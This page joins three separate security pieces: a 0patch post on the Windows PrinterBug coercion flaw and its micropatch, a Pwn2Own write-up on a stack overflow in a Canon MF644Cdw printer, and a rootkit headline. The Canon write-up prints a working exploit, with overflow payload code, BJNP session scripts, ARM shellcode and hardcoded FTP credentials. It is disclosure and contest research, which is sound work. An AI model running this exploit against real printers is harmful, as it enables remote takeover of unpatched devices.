Will Schroeder's subsequent paper "Not A Security Boundary: Breaking Forest Trusts" explains how this bug can be used for breaking the forest trust relationships; with March 2019 Windows Updates, Microsoft provided a related fix for CVE-2019-0683, addressing only the forest trust issue.

Today, four-plus years later, the PrinterBug/SpoolSample still works on all Windows systems for forcing a Windows computer running Print Spooler service to authenticate to attacker's computer, provided the attacker knows any domain user's credentials. As such, it is comparable to PetitPotam, which also still works for a low-privileged attacker (Microsoft only fixed the anonymous attack), and the recently disclosed DFSCoerce issue - which we're also preparing a micropatch for.

The vulnerability can be triggered by making a remote procedure call to a Windows computer (e.g., domain controller) running Print Spooler Service, specifically calling function RpcRemoteFindFirstPrinterChangeNotification(Ex) and providing the address of attacker's computer in the pszLocalMachine argument. Upon receiving such request, Print Spooler Service establishes an RPC channel back to attacker's computer - authenticating as the local computer account! This is enough for the attacker to relay received credentials to a certificate service in the network and obtain a privileged certificate.

When RpcRemoteFindFirstPrinterChangeNotification(Ex) is called, it impersonates the client via the YImpersonateClient function - which is good. The execution then continues towards the vulnerability by calling RemoteFindFirstPrinterChangeNotification. This function then calls SetupReplyNotification, which in turn calls OpenReplyRemote: this function reverts the impersonation (!) before calling RpcReplyOpenPrinter, where an RPC request to the attacker-specified host is made using the computer account.

We're not sure why developers decided to revert impersonation of the caller before making that RPC call, but suspect it was to ensure the call would have sufficient permissions to succeed regardless of the caller's identity. In any case, this allow the attacker to effectively exchange low-privileged credentials for high-privileged ones.

Our Micropatch

When patching an NTLM relaying issue, we have a number of options, for instance:


  • using client impersonation, so the attacker only receives their own credentials instead of server's,
  • adding an access check to see if the calling user has sufficient permissions for the call at all, or
  • outright cutting off the vulnerable functionality, when it seems hard to fix or unlikely to be used.


This particular bug fell into the latter category, as we could not find a single product actually using the affected functionality, and Windows are also not using it in their printer-related products. If it turns out our assessment was incorrect, we can easily revoke this patch and replace it with one that performs impersonation.

Our micropatch is very simple: it simulates an "access denied" (error code 5) response from the RpcReplyOpenPrinter function without letting it make the "leaking" RPC call. This also blocks the same attack that might be launched via other functions that call RpcReplyOpenPrinter.

Source code of the micropatch has just two CPU instructions:

MODULE_PATH "..\Affected_Modules\spoolsv.exe_10.0.17763.2803_Srv2019_64-bit_u202205\spoolsv.exe"
VULN_ID 7419

    PIT spoolsv.exe!0x577df
    ; 0x577df -> return block


        mov ebx, 5
        jmp PIT_0x577df




Micropatch Availability

While this vulnerability has no official patch and could be considered a "0day", Microsoft seems determined not to fix relaying issues such as this one; therefore, this micropatch is not provided in the FREE plan but requires a PRO or Enterprise license.

The micropatch was written for the following Versions of Windows with all available Windows Updates installed: 

  1. Windows 11 v21H2
  2. Windows 10 v21H2
  3. Windows 10 v21H1
  4. Windows 10 v20H2
  5. Windows 10 v2004
  6. Windows 10 v1909
  7. Windows 10 v1903
  8. Windows 10 v1809
  9. Windows 10 v1803
  10. Windows 7 (no ESU, ESU year 1, ESU year 2)
  11. Windows Server 2008 R2 (no ESU, ESU year 1, ESU year 2)
  12. Windows Server 2012
  13. Windows Server 2012 R2
  14. Windows Server 2016
  15. Windows Server 2019 
  16. Windows Server 2022 

This micropatch has already been distributed to, and is being applied to, all online 0patch Agents in PRO or Enterprise accounts (unless Enterprise group settings prevent that). 

If you're new to 0patch, create a free account in 0patch Central, then install and register 0patch Agent from 0patch.com, and email [email protected] for a trial. Everything else will happen automatically. No computer reboot will be needed.

To learn more about 0patch, please visit our Help Center

We'd like to thank Will Schroeder, Lee Christensen, and Matt Nelson of SpecterOps for sharing details about this vulnerability, and Dirk-jan Mollema of Outsider Security for excellent articles on relaying attacks and exploiting PrinterBug/SpoolSample in particular. We also encourage security researchers to privately share their analyses with us for micropatching.

Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup


Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

Firmware extraction and analysis

Downloading firmware

The Canon website is interesting: you cannot download the firmware for a particular model without having a serial number which matches that model. This, as you might guess, is particularly annoying when you want to download a firmware for a model you do not own. Two options came to our mind:

  • Finding a picture of the model in a review or listing,
  • Finding a serial number of the same model on Shodan.

Thankfully, the MFC644cdw was reviewed in details by PCmag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download a firmware from the Canon USA website. The version available online at the time on that website was 06.03.

Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several version of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is https://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do?id=OTUwMzkyMzJk&cmp=ABR&lang=EN. As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case: https://gdlp01.c-wss.com/gds/5/0400006275/01/mac-mf644-a-fw-v0603-64.dmg.

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. https://gdlp01.c-wss.com/rmds/oi/fwupdate/mf640c_740c_lbp620c_660c/contents.xml gives us the actual up-to-date version.

Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

  <content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMDQ5" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  <content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMGFk" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  <content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="http://pdisp01.c-wss.com/gdl/WWUFORedirectSerialTarget.do" >
    <query arg="id" value="OTUwMzZkMTEx" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />

Which correspond to:

  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

  • MF640C => TYPEA
  • MF740C => TYPEB
  • LBP620C => TYPEC

Decryption: black box attempts

Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]

As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with a NCFW magic header. MacOS firmware updates can be extracted with 7z and contain a big file: mf644c_v0603_typea_m64.app/Contents/Resources/.USTBINDDATA which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the unpack_fw.py script.

Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F  !"#$%&'()*+,-./
00000050  30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A 0123456789:;9..z
00000060  34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50 45OPDEF7HI.KMNOP
00000070  51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 QRSTUVWXYZ[\]^_`

The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to have different hypothesis about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt:

  • A xor with a byte counter => fail
  • A xor with counter and feedback => fail

Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption:

  • The updater tool does not decrypt the firmware but sends it as-is => fail
  • Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates:
    • FAIL
    • However, we found unencrypted firmware files with a similar structure which gave use a bit of known plaintext, but did not give any real clue about the solution

Hardware: first look

Main board and serial port

Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware.

  • Looking at the hardware we considered these different approaches to obtain more information:
  • An SPI is present on the mainboard, read it
  • An Unsolder eMMC is present on the mainboard, read it
  • Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction.
  • Some printers are known to have a serial port for debug providing a mini shell. Find one and use it to run debug commands in order to get plaintext/memory dump (NOTE of course we found the serial port afterwards)

Service mode

All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files:

  • SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware.

Decrypting firmware

Program synthesis approach

At this point, this was our train of thought:

  • The encryption algorithm seemed "trivial" (lots of patterns, byte by byte)
  • SUBLOG.TXT gave us lots of plaintext
  • We were too lazy to find it by blackbox/reasoning

As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors.

However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep:

(define int8? (bitvector 8))
(define (int8 i)
  (bv i int8?))

(define-grammar (fast-int8 x y)  ; Grammar of int32 expressions over two inputs:
   (choose x y (?? int8?)        ; <expr> := x | y | <32-bit integer constant> |
           ((bop) (expr) (expr))  ;           (<bop> <expr> <expr>) |
           ((uop) (expr)))]       ;           (<uop> <expr>)
   (choose bvadd bvsub bvand      ; <bop>  := bvadd  | bvsub | bvand |
           bvor bvxor bvshl       ;           bvor   | bvxor | bvshl |
           bvlshr bvashr)]        ;           bvlshr | bvashr
   (choose bvneg bvnot)])         ; <uop>  := bvneg | bvnot

(define (crypt x i)
  (fast-int8 x i #:depth 3))

Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints:

(define sol (solve
; removing constraints speed things up
    (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d))
; [...]        
        (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d))
        (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20))
        (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73))
        (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75))
        (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62))
; [...]        
        (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a))
        (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20))

(print-forms sol)

After running racket rosette.rkt and waiting for a few minutes, we get the following output:

(list 'define '(crypt x i)
  (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8)))
  '(bvsub (bvadd i i) (bvadd x x))))

which is a valid decryption program ! But it's a bit untidy. So let's convert it to C, with a trivial simplification:

uint8_t crypt(uint8_t i, uint8_t x) {
    uint8_t t = i-x;
    return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF;

and compile it with gcc -m32 -O2 using https://godbolt.org to get the optimized version:

mov     al, byte ptr [esp+4]
sub     al, byte ptr [esp+8]
rol     al

So our encryption algorithm was a trivial ror(x-i, 1)!

Exploiting setup

After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability.

We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port.

Serial port: dry shell

The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts.

Among the many powerful features offered, here are the most useful ones:

  • The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted.
  • The ability to perform basic filesystem operations.
  • The ability to list the running tasks and their associated memory segments.

  • The ability to start an FTP daemon, this will come handy later.

  • The ability to inspect the content of memory at a specific address.

This feature was used a lot to understand what was going on during exploitation attempts. One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts.


Attack surface

The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like:

  • Printing functions and protocols,
  • Various web pages,
  • The HTTP server,
  • The SNMP server.

We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing.

Vulnerable function

Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing:

int __fastcall ntpv_isXPrivetTokenValid(char *token)
  int tklen; // r0
  char *colon; // r1
  char *v4; // r1
  int timestamp; // r4
  int v7; // r2
  int v8; // r3
  int lvl; // r1
  int time_delta; // r0
  const char *msg; // r2
  char buffer[256]; // [sp+4h] [bp-174h] BYREF
  char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF
  char sha1_res[24]; // [sp+120h] [bp-58h] BYREF
  int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF
  char last_part[12]; // [sp+150h] [bp-28h] BYREF
  int now; // [sp+15Ch] [bp-1Ch] BYREF
  int sha1len; // [sp+164h] [bp-14h] BYREF

  bzero(buffer, 0x100u);
  bzero(sha1_from_token, 0x18u);
  memset(last_part, 0, sizeof(last_part));
  bzero(str_to_hash, 0x1Cu);
  bzero(sha1_res, 0x18u);
  sha1len = 20;
  if ( ischeckXPrivetToken() )
    tklen = strlen(token);
    base64decode(token, tklen, buffer);
    colon = strtok(buffer, ":");
    if ( colon )
      strncpy(sha1_from_token, colon, 20);
      v4 = strtok(0, ":");
      if ( v4 )
        strncpy(last_part, v4, 10);
    sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part);
    if ( sha1(str_to_hash, 28, sha1_res, &sha1len) )
      sha1_res[20] = 0;
      if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) )
        timestamp = strtol2(last_part);
        time(&now, 0, v7, v8);
        lvl = 86400;
        time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp;
        if ( time_delta <= 86400 )
          msg = "[NTPV] %s: x-privet-token is valid.\n";
          lvl = 5;
          msg = "[NTPV] %s: issue_timecounter is expired!!\n";
        if ( time_delta <= 86400 )
          log(3661, lvl, msg, "ntpv_isXPrivetTokenValid");
          return 1;
        log(3661, 5, msg, "ntpv_isXPrivetTokenValid");
        log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid");
      log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid");
    return 0;
  log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid");
  return 1;

The vulnerable code is the following line:

base64decode(token, tklen, buffer);

With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled is limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple:

-00000178 var_178         DCD ?
-00000174 buffer          DCB 256 dup(?)
-00000074 str_to_hash     DCB 28 dup(?)
-00000058 sha1_res        DCB 20 dup(?)
-00000044 var_44          DCD ?
-00000040 sha1_from_token DCB 24 dup(?)
-00000028 last_part       DCB 12 dup(?)
-0000001C now             DCD ?
-00000018                 DCB ? ; undefined
-00000017                 DCB ? ; undefined
-00000016                 DCB ? ; undefined
-00000015                 DCB ? ; undefined
-00000014 sha1len         DCD ?
-00000010 ; end of stack variables

The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more.

ntpv functions

The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below:

privet_url nptv_urls[8] =
  { 0, "/privet/info", "GET" },
  { 1, "/privet/register", "POST" },
  { 2, "/privet/accesstoken", "GET" },
  { 3, "/privet/capabilities", "GET" },
  { 4, "/privet/printer/createjob", "POST" },
  { 5, "/privet/printer/submitdoc", "POST" },
  { 6, "/privet/printer/jobstate", "GET" },
  { 7, NULL, NULL }
DATA:45C91C0C nptv_cmds       id_cmd <0, ntpv_procInfo>
DATA:45C91C0C                                         ; DATA XREF: ntpv_cgiMain+338↑o
DATA:45C91C0C                                         ; ntpv_cgiMain:ntpv_cmds↑o
DATA:45C91C0C                 id_cmd <1, ntpv_procRegister>
DATA:45C91C0C                 id_cmd <2, ntpv_procAccesstoken>
DATA:45C91C0C                 id_cmd <3, ntpv_procCapabilities>
DATA:45C91C0C                 id_cmd <4, ntpv_procCreatejob>
DATA:45C91C0C                 id_cmd <5, ntpv_procSubmitdoc>
DATA:45C91C0C                 id_cmd <6, ntpv_procJobstate>
DATA:45C91C0C                 id_cmd <7, 0>

After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code.


Triggering the bug

Using a pattern generated with rsbkb, we were able to get the following crash on the serial port:

Dry> < Error Exception >
 CORE : 0
 TYPE : prefetch
 TASK ID   : 269
 TASK Name : AsC2
 R 0  : 00000000
 R 1  : 00000000
 R 2  : 40ec49fc
 R 3  : 49789eb4
 R 4  : 316f4130
 R 5  : 41326f41
 R 6  : 6f41336f
 R 7  : 49c1b38c
 R 8  : 49d0c958
 R 9  : 00000000
 R10  : 00000194
 R11  : 45c91bc8
 R12  : 00000000
 R13  : 4978a030
 R14  : 4167a1f4
 PC   : 356f4134
 PSR  : 60000013
 CTRL : 00c5187d

Which gives:

$ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2

Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.

Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

class PrivetPayload:
    def __init__(self, ret_addr=0x1337):
        self.ret_addr = ret_addr

    def r4(self):
        return b"\x44\x44\x44\x44"

    def r5(self):
        return b"\x55\x55\x55\x55"

    def r6(self):
        return b"\x66\x66\x66\x66"

    def pc(self):
        return struct.pack("<I", self.ret_addr)

    def __bytes__(self):
        return (
            b":" * 0x160
            + struct.pack("<I", 0x20)  # pHashStrBufLen
            + self.r4
            + self.r5
            + self.r6
            + self.pc

The vulnerability can then be triggered with the following code, assuming the printer's IP address is

import base64
import http.client

payload = privet.PrivetPayload()
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(payload)),

conn = http.client.HTTPConnection("", 80)
conn.request("POST", "/privet/register", "", headers)

To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

  • Store our exploit in the buffer used to trigger the overflow and jump into it,
  • Find another buffer we controlled and jump into it,
  • Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.


One of the supported protocols is BJNP, which was conveniently exploited by Synacktiv ninjas on a different printer, accessible on UDP port 8611. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (

class BJNPPkt(Packet):
    name = "BJNP Packet"

        0x0: "Client",
        0x1: "Printer",
        0x2: "Scanner",

        0x000: "GetPortConfig",
        0x201: "GetNICInfo",
        0x202: "NICCmd",
        0x210: "SessionStart",
        0x211: "SessionEnd",
        0x212: "GetSessionInfo",
        0x220: "DataRead",
        0x221: "DataWrite",
        0x230: "GetDeviceID",
        0x232: "CmdNotify",
        0x240: "AppCmd",

        0x8200: "Invalid header",
        0x8300: "Session error",
        0x8502: "Session already exists",

    fields_desc = [
        StrFixedLenField("magic", default=b"MFNP", length=4),
        BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
        BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
        EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
        ShortField("seq_no", default=0),
        ShortField("sess_id", default=0),
        FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
        StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),

For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.

Initial PoC

Quick recap of the exploitation strategy:

  • Start a BJNP session and store our exploit in the session data,
  • Exploit the buffer overflow to jump in the session buffer,
  • Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12

To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr

Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

def store_payload(sock, payload):
    assert len(payload) <= 0x180, ValueError(
        "Payload too long: {} is greater than {}".format(len(payload), 0x180)

    pkt = BJNPPkt(
        body=(b"\x00" * 8 + payload + b"\x00" * (0x180 - len(payload))),

    res = BJNPPkt(sock.recv(4096))

    # The printer should return a valid session ID
    assert res.sess_id != 0, ValueError("Failed to create session")

def cleanup_payload(sock):
    pkt = BJNPPkt(

    res = BJNPPkt(sock.recv(4096))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("", 8610))

bjnp_payloads = bytes.fromhex("4FF0000045F2D84C44F2301CE0474FF000004EF6A031C4F2DE018E467047")
store_payload(sock, bjnp_payload)

privet_payload = privet.PrivetPayload(ret_addr=0x46F2B2B9)
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(privet_payload)),

conn = http.client.HTTPConnection("", 80)
conn.request("POST", "/privet/register", "", headers)




We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

  • Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
  • Make sure the screen is turned on (for example, by disabling the energy save mode as above),
  • Call the display function with our image data to show it on screen.

Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
    unsigned short x;
    unsigned short y;
    unsigned short width;
    unsigned short height;

The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y

Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12

This leaves the question of the image buffer itself.


Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

  • Enable the ftpd service,
  • Upload our image from the client,
  • Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous client, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12

The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it to: either access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="", user="guest", passwd="welcome.") as ftp:
    with open("image.raw") as f:
        ftp.storbinary("STOR a", f)

File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end

The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
add r3, r3, r0
sub r4, r4, r0
cmp r4, #0
bgt .loop

For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12

Putting everything together

In the end, our exploit is split into 3 parts:

  1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
  2. Upload our image using FTP,
  3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the exploit folder and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...


Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.


In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

Linux Threat Hunting: ‘Syslogk’ a kernel rootkit found under development in the wild


